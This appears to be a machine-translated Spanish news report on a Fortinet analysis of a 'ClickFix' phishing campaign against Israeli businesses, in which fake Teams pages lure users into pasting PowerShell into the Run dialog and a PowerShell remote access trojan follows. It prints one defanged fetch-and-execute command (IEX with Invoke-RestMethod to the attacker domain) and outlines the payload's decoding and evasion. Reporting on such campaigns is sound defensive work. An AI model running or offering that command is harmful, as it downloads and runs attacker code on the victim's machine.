Ha surgido una nueva campaña de ataque sofisticada dirigida a las empresas israelíes y los sectores de infraestructura a través de una técnica engañosa de ingeniería social conocida como “ClickFix”, que engaña a los usuarios para ejecutar comandos de PowerShell maliciosos en sus sistemas de Windows.
La cadena de ataque de varias etapas comienza con correos electrónicos de phishing disfrazados de invitaciones a los seminarios web educativos sobre el manejo de los suministros médicos en tiempos de guerra, lo que demuestra cómo los actores de amenaza explotan las tensiones regionales actuales para mejorar su efectividad de la ingeniería social.
Gráfico de flujo de ataque (Fuente – Fortinet)
El ataque funciona a través de una secuencia cuidadosamente orquestada que comienza cuando las víctimas hacen clic en enlaces integrados en correos electrónicos de phishing, redirigiéndolos a las páginas de los equipos de Microsoft falsificadas.
Estas páginas de destino falsas instruyen a los usuarios que realicen una secuencia específica de acciones: presionando Windows+R para abrir el cuadro de diálogo Ejecutar, pegar una cadena copiada usando Ctrl+V y presionar Enter para ejecutar lo que parece ser un proceso de verificación legítimo.
Sin embargo, esta secuencia en realidad desencadena la ejecución de un comando malicioso de PowerShell que inicia la cadena de infecciones.
Analistas de Fortinet identificado Esta campaña de intrusión dirigida a través de su equipo de seguridad del espacio de trabajo de FortiMail, revelando que todo el ataque se basa exclusivamente en la ejecución de PowerShell sin requerir ejecutables externos.
Los investigadores descubrieron evidencia de movimiento lateral y actividad de vigilancia, junto con posibles superposiciones con las tácticas de campaña de Muddywater, aunque la atribución sigue no concluyada debido a las notables diferencias tácticas de las operaciones tradicionales de agua fangosa.
La carga útil inicial contiene un comando PowerShell codificado Base64 ofuscado en tres cadenas dentro del código HTML del sitio de phishing.
Una vez concatenado y decodificado, produce el siguiente comando:-
PowerShell IEx ((Invoke -Restmethod -uri Hxxps (:) // PharmacyNod (.) Com/Fix -Method get) (.) Nota (.) Cuerpo)
Este comando inicia la recuperación y ejecución de un guión de PowerShell secundario de la infraestructura del atacante, estableciendo las bases para el compromiso completo del sistema objetivo.
Entrega de ofuscación y carga útil de varias etapas
El ataque emplea técnicas de ofuscación sofisticadas que demuestran capacidades técnicas avanzadas.
Después de la ejecución inicial de la carga útil, el malware descarga dos archivos críticos: test.html, que contiene un objeto BLOB con datos binarios codificados entre marcadores de etiqueta especiales y un script de PowerShell secundario que reconstruye la carga útil maliciosa final.
Script Infinite Loop (fuente – Fortinet)
El script emplea un mecanismo de decodificación único que divide los trozos codificados binarios separados por el delimitador “Kendrick”, los convierte de caracteres binarios a ASCII, y vuelve a montar el resultado en el código ejecutable de PowerShell.
La etapa final implementa un troyano de acceso remoto por completo a través de PowerShell, estableciendo una comunicación persistente con el servidor de comando y control en PharmacyNod (.) Com.
El malware implementa múltiples técnicas de sigilo, incluida la compresión de GZIP, la codificación BASE64, la inversión de cadenas y las cadenas legítimas de agentes de usuario para evadir la detección mientras se mantiene las capacidades de vigilancia continua en los sistemas comprometidos.
Equipe su SOC con el acceso completo a los últimos datos de amenazas de cualquiera. Obtenga una prueba gratuita de 14 días
